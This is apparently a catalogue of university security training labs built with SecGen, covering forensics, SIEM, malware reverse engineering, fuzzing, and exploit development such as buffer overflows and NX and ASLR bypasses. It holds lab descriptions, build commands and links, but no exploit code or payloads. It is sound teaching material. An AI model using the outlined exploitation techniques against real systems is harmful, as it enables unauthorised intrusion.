You will learn how to mount a disk image read-only, analyze file integrity using MD5 hashes, use Autopsy on Kali to examine file types and check for trojanized executables, conduct timeline analysis to reconstruct the sequence of events, and examine deleted files for hidden clues. You will also investigate log files, identify attempted SSH and Telnet logins, and recover email addresses used in communication. By the end of the lab, you will have gained valuable practical experience in forensic analysis and incident response, equipping you with skills to identify and understand security breaches in real-world scenarios.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/3kiV0ZJWmMY
VM names kali; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Forensics (F) Operating System Analysis storage forensics; data recovery and file content carving; Timeline analysis
Malware & Attack Technology (MAT) Malware Detection identifying the presence of malware
Authentication, Authorisation & Accountability (AAA) Accountability The fallibility of digital evidence to tampering

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/8_dead_analysis.xml run

View source

response_and_investigation/9_siem.xml

Details

Key Data
Name Security information and event management (SIEM) and Elastic (ELK) Stack lab
Description
Introduction
This lab provides a comprehensive overview of logging and security information and event management (SIEM) concepts, with an emphasis on the context of Linux systems. Logging is a critical aspect of system administration and security, enabling the monitoring of system events and providing valuable insights into system activities. The lab covers the fundamentals of logging, including the systemd journal and traditional syslog, and introduces the Elastic (ELK) Stack as a powerful SIEM solution. It also explores the usage of Auditbeat to monitor system audit information and highlights the role of a Security Operations Centre (SOC) in managing and responding to security incidents.

In this lab, you will learn how to use various logging tools and commands, such as journalctl and syslog, to access and analyze system logs. You will gain practical experience in configuring logging rules, utilizing regular expressions to filter log data, and exploring log rotation for efficient log management. Additionally, you will set up Auditbeat to monitor system activities and visualize the collected data using Elastic Stack. By the end of the lab, you will have a strong foundation in log management, SIEM, and be well-equipped to enhance the security and monitoring capabilities of Linux systems.

This is a Hackerbot lab. The labsheet is available once you claim a set of VMs. Work through the labsheet, then when prompted interact with Hackerbot.
Lab sheet https://docs.google.com/document/d/13fzmV01ju4sTFc9R-Fzr6Ti2zQ5UYSx3ClGrycs9XVA/edit?usp=sharing
Type ctf-lab; hackerbot-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/0EafG4CLwA4
VM names siem_management; desktop; hackerbot_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Security Operations & Incident Management (SOIM) Fundamental Concepts workflows and vocabulary; PURPOSE OF LOGGING AND AUDITING
Security Operations & Incident Management (SOIM) Monitor: Data Sources system and kernel logs; Syslog; Linux Journal and SystemD; EVENTS - LOGGING; LOG FILES - CENTRALIZED LOGGING; LOG FILES - EVENT SOURCE CONFIGURATION; LOGGING AND AUDITING OF CHANGES; MONITORING - INTEGRITY; AuditBeat
Security Operations & Incident Management (SOIM) Analyse: Analysis Methods contribution of SIEM to analysis and detection; EVENTS - ANALYSIS
Security Operations & Incident Management (SOIM) Plan: Security Information and Event Management data collection; alert correlation; LOG FILES - INCIDENT RESPONSE; MONITORING - INCIDENT RESPONSE
Security Operations & Incident Management (SOIM) Execute: Mitigation and Countermeasures SIEM platforms and countermeasures; SECURITY INFORMATION AND EVENT MANAGEMENT (SIEM); Configuring Elastic Stack for centralised logging and SIEM

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/response_and_investigation/9_siem.xml run

View source

software_and_malware_analysis/10_anti_sre.xml

Details

Key Data
Name Anti-SRE
Description
Introduction
In this lab on anti-reverse-engineering techniques, you will explore the various tactics employed by both malicious actors and legitimate software developers to thwart the efforts of reverse engineers. This lab provides an in-depth understanding of how malware samples can identify their operating environment, detect the presence of debuggers, and employ anti-disassembly techniques to obfuscate their code.

Throughout this lab, you will learn how malware samples identify virtual machine and sandbox environments, detect debuggers, and modify their runtime behavior. You'll also explore anti-disassembly techniques and code obfuscation methods, gaining hands-on experience with a set of practical challenges. Tasks include analyzing code in disassemblers like Ghidra, bypassing anti-debugging techniques, and deciphering hidden passwords within obfuscated code. By the end of this lab, you will have honed your skills in dynamic analysis and developed a deep understanding of the cat-and-mouse game between malware creators and reverse engineers. Get ready to unlock the secrets of anti-reverse-engineering and enhance your cybersecurity expertise through a series of engaging challenges.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1UsC3zykLAZwoV7bg5hP2hL1zpdxusjSZ3HVBnwZb5M4/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; anti-analysis and evasion techniques

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/10_anti_sre.xml run

View source

software_and_malware_analysis/11_coconut.xml

Details

Key Data
Name Malware Behaviour: Live Sample Analysis
Description A Hackerbot lab involving the analysis of a live malware sample.
Type hackerbot-lab; ctf-lab; lab-sheet
Author ["Tom Shaw", "Mo Hassan"]
VM names desktop; hb_server; victim_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Taxonomy dimensions; kinds
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/11_coconut.xml run

View source

software_and_malware_analysis/1_dynamic_and_static_analysis.xml

Details

Key Data
Name Introduction to Malware analysis lab
Description
Introduction
In this lab on Reverse Engineering and Malware Analysis, you will delve into the world of malicious code analysis and gain a deeper understanding of how to dissect compiled binary programs. By learning the techniques and tools for static and dynamic analysis, you will equip yourself with the skills necessary to identify and analyze malware, investigate security incidents, and develop countermeasures against these threats.

Throughout this lab, you will learn about the two fundamental approaches to malware analysis: static and dynamic analysis. In static analysis, you will explore the contents of binary executable files, deciphering machine code instructions, and extracting useful information such as strings and metadata. You will use tools like hexdump, readelf, and strings to dissect the structure of executable files and understand their behavior without executing them. In dynamic analysis, you will run malware in a controlled environment, monitoring system calls and dynamic library functions using tools like strace and ltrace. Additionally, you will participate in practical exercises by solving reverse engineering Capture The Flag (CTF) challenges that apply the concepts learned in the lab. By the end of this lab, you will have a strong foundation in malware analysis techniques, preparing you for further exploration of lower-level concepts such as C and assembly code, which are essential in the world of cybersecurity.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1CRGtnCTOogpEIjl-tLYdZqHBwJt75FpUJTE2xUL9wqI/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/14Hv_QodLxs; https://youtu.be/quKsZbpvYIY; https://youtu.be/CxZx7b3OPsg; https://youtu.be/3qmmqfBtJio; https://youtu.be/k3NwrFWuhaY
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Taxonomy dimensions; kinds
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/1_dynamic_and_static_analysis.xml run

View source

software_and_malware_analysis/2_intro_to_c.xml

Details

Key Data
Name Introdution to C lab
Description
Introduction
In this lab, you will dive into the world of the C programming language, exploring its fundamental concepts and practical applications. Understanding C is essential, not only for programming but also for dissecting and analyzing malware, as many malicious programs are still written in C due to its low-level control over system resources. The lab begins by differentiating between high and low-level languages, highlighting the importance of assembly language and its human-readable representation. It emphasizes that, while you'll be working with high-level languages like C, you should be aware of the low-level details, which will be crucial for future tasks in the realm of cybersecurity.

Throughout the lab, you will learn the basics of C programming by working on hands-on exercises. You'll start by creating a simple "Hello, world!" program, and then progress to explore data types, arrays, strings, conditionals, loops, functions, and pointers. For instance, you will write code to calculate averages and VAT, work with pointers to access memory addresses, and understand the relationship between arrays and pointers. By the end of this lab, you will have gained practical experience in C programming, setting a solid foundation for future endeavors in the field of cybersecurity and malware analysis.

This lab covers really important fundamentals. There are no flags this week.
Lab sheet https://docs.google.com/document/d/1qaq8LF6wbe9OvXwAqmLQ_FA-1OTRkRVxjH5O5KRDM2w/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thalita Vergilio
Linked videos https://youtu.be/chebVVwj1kM; https://youtu.be/2R4QzDAfzLQ
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Technical Underpinning Technical underpinnings for malware analysis: C

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/2_intro_to_c.xml run

View source

software_and_malware_analysis/3_c_and_asm.xml

Details

Key Data
Name C and Assembly lab
Description
Introduction
In this lab, we delve into the world of C programming and assembly language, covering essential concepts and practical tasks to build a strong foundation in low-level programming. We begin by exploring the use of structs in C, a fundamental data type for handling composite data structures. You'll learn how to define and manipulate structs, enabling you to work with more complex data in programs.

Moving on to memory management, you'll understand the difference between the stack and heap, gaining insights into dynamic memory allocation and the crucial task of memory deallocation to prevent memory leaks. Practical examples and exercises will guide you through these concepts, including using the Valgrind tool to check for memory issues. Additionally, you'll dive into the world of bitwise operators, essential for disassembling code. You'll explore the use of operators like AND, OR, XOR, and more, and even work on a challenge where you'll need to reverse engineer a binary code. Finally, we introduce you to the fascinating realm of assembly language for 32-bit x86 processors, covering registers, flags, operands, and basic instructions. You'll practice disassembling code, identifying key elements, and gaining insights into the low-level operations of a computer system. Practical challenges and real-world scenarios will empower you with the knowledge and skills needed for low-level programming and reverse engineering.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.

Lab sheet https://docs.google.com/document/d/14bEEdrJb0hGS5sBR-mOTWzCY-ws1LFDza3sIM04Akvg/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thalita Vergilio
Linked videos https://youtu.be/QbyorEb3WTs
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments
Malware & Attack Technology (MAT) Technical Underpinning Technical underpinnings for malware analysis: C; Technical underpinnings for malware analysis: ASM

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/3_c_and_asm.xml run

View source

software_and_malware_analysis/4_asm.xml

Details

Key Data
Name Recognising C Code Constructs in Assembly lab
Description
Introduction
In this lab you will dive deep into the world of 32-bit x86 assembly language to gain a comprehensive understanding of how C code constructs are represented in assembly. This knowledge is not only essential for understanding how software functions at a low level but also for identifying and analyzing malicious code and vulnerabilities. The lab will cover crucial theoretical concepts, including branching, conditionals, loops, switch statements, arrays, strings, and structs in assembly language.

Throughout this lab, you will learn how to recognize and map C code constructs into their assembly language counterparts. You will engage in hands-on activities such as disassembling C programs using tools like objdump, and analyzing the resulting assembly code to identify key elements like loops, conditionals, and switch statements. You will also solve practical challenges within the lab, such as finding specific flags hidden within assembly code by following hints and performing dynamic analysis. By the end of this lab, you will have a solid grasp of these reverse engineering and malware analysis fundamentals, equipped with the skills to dissect and understand low-level code structures and uncover elements within them.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1l4tU49JhI65Q85Zv9I1Wm1kaHNENp6iyIwMUhM8j_14/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thalita Vergilio
Linked videos https://youtu.be/8b6JokfEFEo
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; STATIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/4_asm.xml run

View source

software_and_malware_analysis/5_ghidra.xml

Details

Key Data
Name Ghidra lab
Description
Introduction
In this lab you will dive into the fascinating world of software reverse engineering (SRE) using the powerful tool Ghidra. SRE plays a crucial role in understanding the inner workings of software without access to its source code, making it a critical skill for cybersecurity professionals, software developers, and anyone interested in understanding how programs function at a low level. You will explore key theoretical concepts such as CPU architectures, memory layout randomization, and the role of external libraries in program execution.

Throughout this lab, you will embark on a hands-on journey to reverse engineer and analyze various aspects of executable files. You will start by creating and analyzing a simple "Hello, world!" program, learning how to set up Ghidra, import and analyze files, and interpret disassembled and decompiled code. You will also investigate the differences between 32-bit and 64-bit CPU architectures and the impact of memory layout randomization. As you progress, you will tackle challenges that require you to annotate and comment on code, rename functions and variables, and add valuable insights through comments. By the end of this lab, you will have gained practical experience in software reverse engineering and developed a deeper understanding of how to unravel the mysteries hidden within executable files.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the file.
Lab sheet https://docs.google.com/document/d/1d2l1Z5l3r-DOdt-MG96H8HdhmN2l54dz8TL-8iigxWU/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/0zUmUZoEpC4; https://youtu.be/m73pHO_0vhI
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; STATIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/5_ghidra.xml run

View source

software_and_malware_analysis/6_ghidra_analysis.xml

Details

Key Data
Name Ghidra lab analysis
Description
Introduction
Using the skills you have developed thus far, there are two binaries to practice SRE with Ghidra.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; STATIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/6_ghidra_analysis.xml run

View source

software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml

Details

Key Data
Name Ghidra lab with LIVE MALWARE SAMPLES
Description You will find live malware samples in /opt/theZoo.
Type lab-sheet
Author Z. Cliffe Schreuders
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/6_ghidra_with_live_malware_samples.xml run

View source

software_and_malware_analysis/7_dynamic.xml

Details

Key Data
Name Dynamic analysis SRE
Description
Introduction
Dynamic analysis and debugging play a pivotal role in the field of cybersecurity and malware analysis. In this lab, you will delve into the world of dynamic malware analysis, a critical practice for understanding how malicious software behaves at runtime. You will learn how to use the GNU Debugger (GDB) to dissect and monitor a program's execution, even when you don't have access to its source code. This is particularly valuable for cybersecurity professionals and malware analysts, as it enables them to identify and analyze malicious behavior, ultimately contributing to the development of effective security measures.

Throughout this lab, you will gain a comprehensive understanding of GDB, from setting breakpoints and examining memory locations to analyzing registers and making informed decisions about program execution. You will explore practical examples, such as setting breakpoints at specific locations in the code, examining memory content, and identifying crucial information like passwords. By the end of this lab, you will have the skills necessary to conduct dynamic analysis and debug potentially malicious programs effectively, providing invaluable insights into their runtime behavior and enhancing your expertise in the realm of cybersecurity and malware analysis.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1EuTmklR3AVxdiYTrzyJ89vHU9UUY2QOn3oU74zQF19k/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/6MeJIr3EKKM
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; DYNAMIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/7_dynamic.xml run

View source

software_and_malware_analysis/8_dynamic_continued.xml

Details

Key Data
Name Dynamic analysis SRE (cont.)
Description
Introduction
Building upon the skills acquired in the previous lab, this hands-on debugging session takes your expertise to the next level with a fresh set of challenges.These new exercises further enhance your dynamic analysis capabilities using the GNU Debugger (GDB). In the world of reverse engineering and cybersecurity, debugging is an indispensable skill, particularly when the source code remains elusive. This lab provides the ideal platform to fortify your skills by introducing unique challenges, each designed to push the boundaries of your GDB proficiency.

You'll set breakpoints, scrutinize register values, and decipher assembly instructions to uncover concealed passwords and flags. For example, in the "XorStr" challenge, you'll leverage GDB to identify an XOR mask and use it to decrypt a string, while "StaticInt" will have you focusing on EAX values and local variables to print the flag. By the conclusion of this lab, you will have cemented your debugging abilities and effectively surmounted eight new challenges, solidifying your expertise in dynamic analysis for situations where source code accessibility is restricted.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/11A7tZppId1pxbcclZDPr6e-zwWPKqPnJMgyAtcARR2s/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/pExTbDVt0Gw
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments; DYNAMIC ANALYSIS

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/8_dynamic_continued.xml run

View source

software_and_malware_analysis/9_malware_behaviour.xml

Details

Key Data
Name Malware Behaviour
Description
Introduction
A MetaCTF lab. In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the
program expects. Once you have found the password, run the program and enter the password to receive the file.

There are binaries to perform dynamic SRE.
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/6XMrHyAqD-4; https://youtu.be/KJPeZptzl1U; https://youtu.be/6qeDnjOaRiI
VM names metactf

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Malware & Attack Technology (MAT) Malware Taxonomy dimensions; kinds
Malware & Attack Technology (MAT) Malware Analysis analysis techniques; analysis environments

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_and_malware_analysis/9_malware_behaviour.xml run

View source

software_security_exploitation/1_c_asm_iof.xml

Details

Key Data
Name Understanding Software Vulnerabilities: C, Debugging Assembly, and Buffer Overflows
Description
Introduction
This lab provides an introduction to the fundamental concepts of software vulnerabilities, programming in C, and debugging assembly code. It emphasizes the importance of secure coding and understanding the potential security flaws that can arise due to programming errors. In this lab, you will learn how small programming mistakes can result in software vulnerabilities with serious consequences. You will explore two main categories of software flaws: design problems and implementation problems. Common programming errors leading to security flaws, such as memory errors, input handling, and misuse of pointers and strings, will be discussed.

You will dive into programming in C, debugging assembly code using GDB, and understanding the stack structure in memory. You will create and compile simple C programs, explore the basics of assembly code, and learn to use GDB for debugging. The lab includes practical tasks, such as writing and running C programs, analyzing assembly code, and identifying security vulnerabilities in the code. You'll experiment with different inputs to understand how software vulnerabilities can be exploited and how to fix them, using secure coding practices. By the end of the lab, you will have a better grasp of software vulnerabilities and the tools and techniques for identifying and addressing them in C programs.

Overall, this lab serves as a foundational module for understanding software security, highlighting the critical role of secure coding practices and the potential consequences of software vulnerabilities.

In your home directory you will find some binaries that you need to reverse engineer in order to determine the password that the program expects. Once you have found the password, run the program and enter the password to receive the flag.
Lab sheet https://docs.google.com/document/d/1AxTve1RBzqvdPxt8Wziga2x2e3lZp4k5YsMq3KxkXzM/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/jo_07iOplzA; https://youtu.be/1Hy_166CwRk
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities Integer overflow
Software Security (SS) Prevention of Vulnerabilities language design and type systems

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/1_c_asm_iof.xml run

View source

software_security_exploitation/2_race_conditions_format_str.xml

Details

Key Data
Name Understanding Software Vulnerabilities: Injection Attacks, Race Conditions, and Format String Attacks
Description
Introduction
Software vulnerabilities can have severe consequences, stemming from design and implementation problems. These problems can range from simple memory errors and bounds checking, like buffer overflows, to more complex issues such as race conditions, format string attacks, and misconfigured security mechanisms. In this lab you will learn to identify and understand these programming flaws through hands-on exercises.

You will explore command injection vulnerabilities. You'll be tasked with creating, compiling, and running and exploiting a C program susceptible to command injection. You will investigate concepts including validation and sanitization, essential for securing your code against malicious input. You will also learn how to use the diff and patch commands to create and apply code patches. You will also investigate and attack time of check to time of use race conditions. Lastly, you'll explore format string attacks, examining their dangers and vulnerabilities.

By the end of this lab, you will have acquired a deeper understanding of software vulnerabilities and learned practical techniques to identify, prevent, and mitigate these issues in your own code. These skills are invaluable for anyone involved in software development and cybersecurity.

In your home directory you will find some binaries representing challenges to complete to receive the flags.
Lab sheet https://docs.google.com/document/d/1GKmNARyF2-RQ-jK1_w4Y7V9vNtXsJvMmvXSbnadyEoE/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/nVpqjsfii6c; https://youtu.be/PH73lpG2B1M; https://youtu.be/Du3fVc_ZLiI
VM names desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities race condition vulnerabilities; structured output generation vulnerabilities; Format string attacks
Software Security (SS) Prevention of Vulnerabilities race condition mitigations; structured output generations mitigations

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/2_race_conditions_format_str.xml run

View source

software_security_exploitation/3_bug_hunting_and_fuzzing.xml

Details

Key Data
Name Bug Hunting and Fuzzing
Description
Introduction
Identifying and fixing software vulnerabilities is of paramount importance. This lab introduces two techniques for bug hunting: Fuzzing and Static Analysis. These methods are essential for uncovering hidden security flaws in software, which can be exploited for malicious purposes if left unaddressed. Fuzzing involves sending unexpected and often malformed data as input to a program, searching for weaknesses, while Static Analysis employs automated tools to analyze the code structure for potential issues. This lab provides a hands-on experience in finding and exploiting vulnerabilities.

In this lab, you will learn how to manually audit C code to spot errors and use various fuzzing techniques to test network programs for security flaws. You will start by auditing and securing C code, identifying vulnerabilities, and fixing potential issues. You will then explore the world of fuzzing, where you will learn to use tools like Spike to send various inputs to network services to uncover potential vulnerabilities. The lab also guides you through Metasploit's FTP fuzzing module. Finally, you will apply your knowledge to CTF challenges, running and fuzzing network services to crash programs and uncover flags. By the end of this lab, you will have gained practical skills and knowledge in software security testing and vulnerability detection.
Lab sheet https://docs.google.com/document/d/1yuDcFkI2-KD4Xfti4PahE038o-6324LKSx075ZSsuKw/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/nwxtlR31hvw; https://youtu.be/vT2PP7VnSNw
VM names windows_victim; kali; desktop

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Detection of Vulnerabilities dynamic detection

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/3_bug_hunting_and_fuzzing.xml run

View source

software_security_exploitation/4_exploit_development.xml

Details

Key Data
Name Exploit Development
Description
Introduction
Exploit development involves identifying and exploiting vulnerabilities in software or systems, potentially granting unauthorized access. In this hands-on lab, you will delve into the advanced topic of exploit development, focusing on Windows stack-smashing buffer overflows, a common type of vulnerability.

Throughout this lab, you will work on a Kali Linux system as the attacker and a Windows VM as the victim/debugger, targeting a vulnerable FTP server. The lab guides you through several crucial steps, including manual exploitation, writing your first Metasploit (MSF) exploit module, finding the offset within the input that overwrites the EIP (Extended Instruction Pointer), adding shellcode to control the target system, and ultimately gaining remote access to the compromised system. By the end of this lab, you will have not only gained theoretical knowledge of exploit development but also practical experience in crafting and launching your own exploits against real-world vulnerabilities.
Lab sheet https://docs.google.com/document/d/1tsKUaCetdqwDmey4JK9DYrcO9XDx4EwE2RIvSbP6zQQ/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Z. Cliffe Schreuders
Linked videos https://youtu.be/Zh7IdmnCfy0; https://youtu.be/WU06L-u0t2Q; https://youtu.be/j2S-XgY-Fyg; https://youtu.be/Lf1UPaqPJMM; https://youtu.be/5OUQ7ExlgKI
VM names windows_victim; kali; windows_victim_server

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/4_exploit_development.xml run

View source

software_security_exploitation/5_linux_stack_bof.xml

Details

Key Data
Name Writing Exploits: Linux and Stack-smashing Buffer Overflows
Description
Introduction
Buffer overflows are a common security issue that can be exploited to gain unauthorized access to a system or execute malicious code. In this lab you will delve deeper into the world of buffer overflow vulnerabilities, this time on Linux systems, expanding upon the skills learned in the previous lab. The exercises will cover both manual exploitation techniques and the development of Metasploit exploits, while introducing Capture The Flag (CTF) challenges of increasing complexity. By the end of this lab, you will have a deeper understanding of exploit development, honing your skills in identifying and exploiting buffer overflows on both Windows and Linux, further enriching your knowledge in the world of cybersecurity.

Throughout this lab, you will learn how to identify and exploit buffer overflow vulnerabilities in Linux applications. You will start by manually causing buffer overflows, identifying memory addresses, and understanding the significance of these addresses. Subsequently, you will create Metasploit exploit modules to automate the exploitation process. The lab includes Capture The Flag (CTF) challenges, where you will create and deplou attacks to gain shell access to complete specific objectives. The challenges will require you to jump to existing code, inject your own shellcode, and tackle varying levels of complexity. By the end of this lab, you will have a solid grasp of exploit development and practical experience in exploiting buffer overflow vulnerabilities on Linux systems.
Lab sheet https://docs.google.com/document/d/1wgxLYHkdeLknRcbzZY73xZt36TWExuu-lfIJhRuHE-I/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
Linked videos https://youtu.be/oi_CfBe_umU; https://youtu.be/Wry2get_RRc
VM names metactf_desktop; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/5_linux_stack_bof.xml run

View source

software_security_exploitation/6_linux_nx_bypass.xml

Details

Key Data
Name Linux bypassing NX bit with return-to-libc
Description
Introduction
In this lab, you will develop your knowledge of memory protections and exploit techniques. The focus is on bypassing the Non-Executable (NX) stack protection, which aims to prevent attackers from running malicious code on the stack. You'll explore the theoretical concept of NX stack protection, understand how it is implemented in Linux, and learn about return-to-libc attacks, a clever exploit technique that allows you to redirect a program's execution to functions within the Standard C Library (libc) without executing any external code.

Throughout this lab, you will learn how to bypass NX stack protection and write return-to-libc exploits. You will find the offset for the Instruction Pointer (EIP), identify the memory addresses of essential functions like execve() and exit() within libc, and construct a fake stack frame to trigger a shell using these functions. As practical tasks, you will write a Metasploit exploit module, analyze memory addresses, and run your exploit to successfully gain control over a vulnerable program.

The CTF challenges are similar to those from the last topic, however the vulnerable software has been compiled with stack protections and non-executable stack, which you will learn to circumvent.
Lab sheet https://docs.google.com/document/d/1eUOb1cR-D8qv0NmlGXYUN1JYwmgrwOBNtfsDVdxnPpw/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
Linked videos https://youtu.be/ywLXfSR5YWk
VM names metactf_desktop; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows
Software Security (SS) Mitigating Exploitation NON-EXECUTABLE MEMORY
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development; Mitigation bypass: non-executable memory

Command to build VMs and start scenario:

ruby secgen.rb -s scenarios/labs/software_security_exploitation/6_linux_nx_bypass.xml run

View source

software_security_exploitation/7_linux_aslr_bypass.xml

Details

Key Data
Name Linux ASLR bypass
Description
Introduction
Address Space Layout Randomization (ASLR) is a critical security feature in modern operating systems. ASLR randomizes the memory addresses of various program components, making it challenging for attackers to exploit vulnerabilities. You'll explore challenges designed to help you understand how ASLR works and how to bypass it.

Throughout the lab, you'll learn how to leverage information leaks and brute-force attacks to overcome ASLR, PIE and RelRO. You'll set up your exploit development environment using the Metasploit framework, identify the offsets and addresses of critical functions, and craft exploits to control program execution. Specifically, you will capture an information leak, calculate function offsets, and redirect control flow to a target function. Subsequently, you'll tackle a more complex scenario where there's no information leak, relying on brute-force to bypass ASLR and gain access to a hidden flag. These practical tasks will equip you with valuable skills in vulnerability exploitation and security assessment.
Lab sheet https://docs.google.com/document/d/1NVWjD257EN0pv14G6dD44VpSPYlrR6IC2HPihrsGPnY/edit?usp=sharing
Type ctf-lab; lab-sheet
Author Thomas Shaw
Linked videos https://youtu.be/v2rChKDAmFg; https://youtu.be/xwsBaNQZozg
VM names metactf_desktop; kali

CyBOK KAs, Topics, and Keywords

KA Topic Keywords
Software Security (SS) Categories of Vulnerabilities memory management vulnerabilities; Stack smashing buffer overflows
Software Security (SS) Mitigating Exploitation ASLR (ADDRESS SPACE LAYOUT RANDOMIZATION)
Malware & Attack Technology (MAT) Attacks and exploitation EXPLOITATION; EXPLOITATION FRAMEWORKS; Exploit development; Metasploit Framework development; Mitigation bypass: ASLR

Command to build VMs and start scenario:

